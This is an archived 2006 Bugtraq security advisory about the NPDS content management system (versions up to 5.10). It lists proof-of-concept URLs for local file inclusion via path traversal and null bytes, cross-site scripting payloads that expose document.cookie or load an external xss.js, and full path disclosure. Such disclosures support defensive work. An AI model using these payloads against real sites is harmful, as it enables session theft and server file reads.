| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060608091850.20369.qmail@securityfocus.com> Date: 8 Jun 2006 09:18:50 -0000 From: gmdarkfig@...il.com To: bugtraq@...urityfocus.com Subject: NPDS <= 5.10 Local Inclusion, XSS, Full path disclosure // Script Web -------- www.npds.org versions --- NPDS <= 5.10 Solutions -- None official Note ------- Vendor has been contacted // Local Inclusion http://[...]/header.php?Default_Theme=../apache/logs/error.log%00 http://[...]/modules/cluster-paradise/cluster-E.php?ModPath=../../../../../apache/logs/error.log%00 // Cross Site Scripting http://[...]/header.php?Titlesitename=</title><script>alert(document.cookie)</script> http://[...]/header.php?sitename="><script>alert(document.cookie)</script> http://[...]/meta/meta.php?nuke_url="><script>alert(document.cookie)</script> http://[...]/viewforum.php?forum=2"><script src=http://[...]/xss.js> http://[...]/editpost.php?forum=1&post_id=888"><script src=http://[...]/xss.js> http://[...]/editpost.php?forum=1"><script src=http://[...]/xss.js> http://[...]/editpost.php?forum=1&topic="><script src=http://[...]/xss.js> http://[...]/editpost.php?forum=1&arbre="><script src=http://[...]/xss.js> http://[...]/user.php?op=only_newuser&uname="><script src=http://[...]/xss.js> http://[...]/user.php?op=only_newuser&email="><script src=http://[...]/xss.js> // Full Path Disclosure http://[...]/header.php http://[...]/modules/contact/contact.php http://[...]/modules/sform/forum/forum_extender.php // Credits by DarkFig -- http://www.acid-root.new.fr/advisories/npds510.txt
Powered by blists - more mailing lists